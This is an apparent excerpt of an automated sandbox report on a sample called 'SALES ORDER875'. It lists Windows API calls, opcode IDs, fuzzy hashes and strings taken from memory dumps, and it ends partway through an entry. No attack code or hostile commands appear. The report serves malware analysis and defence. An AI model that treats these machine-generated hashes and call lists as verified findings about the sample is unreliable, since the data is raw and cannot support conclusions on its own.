                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                    • String ID: 0$F
                                                                                                                                                                                    • API String ID: 161812096-3044882817
                                                                                                                                                                                    • Opcode ID: 06a15e57ee5ea0c853d0cb2edbce36035fc10180d1275554d088e5ee370f12d8
                                                                                                                                                                                    • Instruction ID: 93c0eb9d4de8540a40e9455b473167ae44b3c331cd60b70864de1e0591943246
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a15e57ee5ea0c853d0cb2edbce36035fc10180d1275554d088e5ee370f12d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11418B79A01209EFDB14CF64E884BEA7BB6FF49345F144029F90697360D734AA10CF98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00413A9D
                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00413AA0
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00413AC7
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00413AEA
                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00413B62
                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00413BAC
                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00413BC7
                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00413BE2
                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00413BF6
                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00413C13
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                                                    • Opcode ID: 73599dcb6986ff074a90ffd131c01724bab6759d146ffc175fcd81ade08ad9c1
                                                                                                                                                                                    • Instruction ID: d61bac4c5daaf9f54fc0ee64536a1c58287c391ebebc45ae500ae5cdcb6893da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 73599dcb6986ff074a90ffd131c01724bab6759d146ffc175fcd81ade08ad9c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00619C75900248AFDB10DF68CC81FEE77B8EB09304F1000AAFA15A73A2D774AE85DB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003EB151
                                                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003EA1E1,?,00000001), ref: 003EB165
                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 003EB16C
                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003EA1E1,?,00000001), ref: 003EB17B
                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 003EB18D
                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003EA1E1,?,00000001), ref: 003EB1A6
                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003EA1E1,?,00000001), ref: 003EB1B8
                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003EA1E1,?,00000001), ref: 003EB1FD
                                                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003EA1E1,?,00000001), ref: 003EB212
                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003EA1E1,?,00000001), ref: 003EB21D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                                                    • Opcode ID: 7ef8430dcde984489a1b1788c7fbf6a7702ce405f43e50f74717df0edda7d1ba
                                                                                                                                                                                    • Instruction ID: 04aa86a1f13d6dd01f851d4665e952919bf4643d59d944c1d83018b81c3c5ebe
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ef8430dcde984489a1b1788c7fbf6a7702ce405f43e50f74717df0edda7d1ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7931CC75580314BFDB139F25DC88BAEBBA9AF10756F118624FA00C61D1D7B0DA008F68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2C94
                                                                                                                                                                                      • Part of subcall function 003B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000), ref: 003B29DE
                                                                                                                                                                                      • Part of subcall function 003B29C8: GetLastError.KERNEL32(00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000,00000000), ref: 003B29F0
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2CA0
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2CAB
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2CB6
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2CC1
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2CCC
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2CD7
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2CE2
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2CED
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2CFB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 1de8e2afcf6068947738d59d4bd297dddf758588297cd7fa6a3582a34515009d
                                                                                                                                                                                    • Instruction ID: 5cc37d61d48dfb88c83556cc2ac969a5b84fbdb7a6ffb8a23978729fbbc716d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1de8e2afcf6068947738d59d4bd297dddf758588297cd7fa6a3582a34515009d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B5116676500108BFCB03EF55D942CDE3BA5FF06354F514AA5FA485FA22DB31EA609B90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00381459
                                                                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 003814F8
                                                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 003816DD
                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 003C24B9
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 003C251E
                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003C254B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                    • String ID: close all
                                                                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                                                                    • Opcode ID: 867fdb6875c26b8d38fc1e7e945562a55b64ad01579fcbb11e57cde42489383d
                                                                                                                                                                                    • Instruction ID: 8601a91ada42c8ff5908f03995614b935d9ddacb86fed3e08a3c92f2249f1b6b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 867fdb6875c26b8d38fc1e7e945562a55b64ad01579fcbb11e57cde42489383d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65D148717012128FDB1AEF15C895F6AF7A8BF05700F2542EDE84AAB261DB31AD12CF54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00385C7A
                                                                                                                                                                                      • Part of subcall function 00385D0A: GetClientRect.USER32(?,?), ref: 00385D30
                                                                                                                                                                                      • Part of subcall function 00385D0A: GetWindowRect.USER32(?,?), ref: 00385D71
                                                                                                                                                                                      • Part of subcall function 00385D0A: ScreenToClient.USER32(?,?), ref: 00385D99
                                                                                                                                                                                    • GetDC.USER32 ref: 003C46F5
                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003C4708
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 003C4716
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 003C472B
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 003C4733
                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003C47C4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                                                                    • Opcode ID: 018dfbd1aedf57c606acff1b082f0d776d647a8d958af5e1aace52946b33d002
                                                                                                                                                                                    • Instruction ID: 410691fc25cdb24b0f8a9b590680e7efa7a064bce122095472de5b198b61a84d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 018dfbd1aedf57c606acff1b082f0d776d647a8d958af5e1aace52946b33d002
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5471B931400305DFCF229F64C994FEA3BB5FF4A325F154269E9669A2AAC7318C91DF60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003F35E4
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • LoadStringW.USER32(00452390,?,00000FFF,?), ref: 003F360A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                    • API String ID: 4099089115-2391861430
                                                                                                                                                                                    • Opcode ID: afc1fd618bcd223a7f74d332195446aa47a558640605167a65f9a648e0c37a68
                                                                                                                                                                                    • Instruction ID: 0e5b5f1df5346f54d163c188f104a3f4b216ab20febac39f844b01da90603641
                                                                                                                                                                                    • Opcode Fuzzy Hash: afc1fd618bcd223a7f74d332195446aa47a558640605167a65f9a648e0c37a68
                                                                                                                                                                                    • Instruction Fuzzy Hash: 43517E7190021ABADF16FBA0CC42EFDBB38AF04300F144166F505761A2EB715B99DBA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003FC272
                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003FC29A
                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003FC2CA
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003FC322
                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 003FC336
                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 003FC341
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                                                                    • Opcode ID: 32dbeb8a16b07768255ade86afe19c1c97d6bb8ad67d1057db38b1e6f28a3a46
                                                                                                                                                                                    • Instruction ID: de7e1f053f2f525851835c218c1712273ca9689155de6fd049623f03893308b0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 32dbeb8a16b07768255ade86afe19c1c97d6bb8ad67d1057db38b1e6f28a3a46
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6531C0B569020CAFD7229F648E88ABB7BFCEB49780F04952EF546D6240DB34DD048B64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003C3AAF,?,?,Bad directive syntax error,0041CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 003E98BC
                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,003C3AAF,?), ref: 003E98C3
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003E9987
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                    • API String ID: 858772685-4153970271
                                                                                                                                                                                    • Opcode ID: 2178d7a495b020f722411f903cf2eedf011352097254d050fe39ddb646a24e47
                                                                                                                                                                                    • Instruction ID: c0d171e7d1a5d5ac9c6754650b61e08895c49a2937b47d8947a756e424005c0e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2178d7a495b020f722411f903cf2eedf011352097254d050fe39ddb646a24e47
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF21A03194031AABDF12AF90CC06FEE7739BF18700F04446AF5156A0A2EB759A18CB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32 ref: 003E20AB
                                                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 003E20C0
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003E214D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                                                                                    • Opcode ID: b912def58df289e2956004614322ddd2f5af5cb1240c32df392fb6874d0e8b9b
                                                                                                                                                                                    • Instruction ID: 96a118db074df4008a027705b08fe5b23a9f2796b213ef40550db3883e7d77a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: b912def58df289e2956004614322ddd2f5af5cb1240c32df392fb6874d0e8b9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F1129766C8756BAFE072221EC07EE7379CCB05324B310226FB04A90E2FEB569115618
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1282221369-0
                                                                                                                                                                                    • Opcode ID: b1af8f20813b7b629133b7dbdcdcd1d9b881a4bc4cfecaca7829e9466b9d7c4d
                                                                                                                                                                                    • Instruction ID: 27b6b8eb535607c0b733219c33787d4fc493e82324b57034996c47263e5cd2b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1af8f20813b7b629133b7dbdcdcd1d9b881a4bc4cfecaca7829e9466b9d7c4d
                                                                                                                                                                                    • Instruction Fuzzy Hash: AF612871A04301AFDB33AFB49881AFA7BA5EF05318F0546BDFB449BA82E7319D018750
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00415186
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004151C7
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 004151CD
                                                                                                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 004151D1
                                                                                                                                                                                      • Part of subcall function 00416FBA: DeleteObject.GDI32(00000000), ref: 00416FE6
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0041520D
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0041521A
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0041524D
                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00415287
                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00415296
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3210457359-0
                                                                                                                                                                                    • Opcode ID: 7e4ee1b0c45dc8f91d6efca4a909557732fe6c6cbf719ae868164a76f9d74685
                                                                                                                                                                                    • Instruction ID: 8457e6d22e611a916043054ab08c8281e2ddf842b698900777b500871a23532e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e4ee1b0c45dc8f91d6efca4a909557732fe6c6cbf719ae868164a76f9d74685
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C51C331A90A08FEEF219F24CC45BD93B65EB85325F148057F5149A2E0C7BD99C0DF49
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 003D6890
                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003D68A9
                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003D68B9
                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003D68D1
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003D68F2
                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00398874,00000000,00000000,00000000,000000FF,00000000), ref: 003D6901
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003D691E
                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00398874,00000000,00000000,00000000,000000FF,00000000), ref: 003D692D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
